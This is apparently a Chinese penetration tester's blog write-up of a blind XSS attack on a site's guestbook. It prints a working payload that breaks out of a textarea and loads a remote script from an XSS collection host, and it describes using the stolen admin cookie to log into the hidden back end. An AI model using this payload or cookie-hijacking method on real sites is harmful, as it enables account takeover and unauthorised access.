今天接到个渗透测试的活,基本上就是静态站,本来也不报啥希望了,扫了一圈整个站就一个留言功能,根据经验一般留言就是在标签里,所以右键查看下元素,确定留言内容确实在里面,随手一个xss盲打未拦截,成功提交留言。
盲打使用的xss平台的默认模块Payload:
ccc”</tExtArEa><sCRiPt sRC=https://xss8.cc/CnQ6></sCrIpT><textarea>
快下班时意外收到了弹回来的cookie,并且定位到了该站后台地址如下图,话说这个地址 FUZZ是FUZZ不出来,怪不得早上忙活半天也没找到后台地址,┭┮﹏┭┮
有了cookie和后台地址,那我们就可以利用这个登陆了
找了个火狐插件cookie-editor,把这个cookie值填进去,访问那个HTTP_REFERER地址成功登陆进去啦。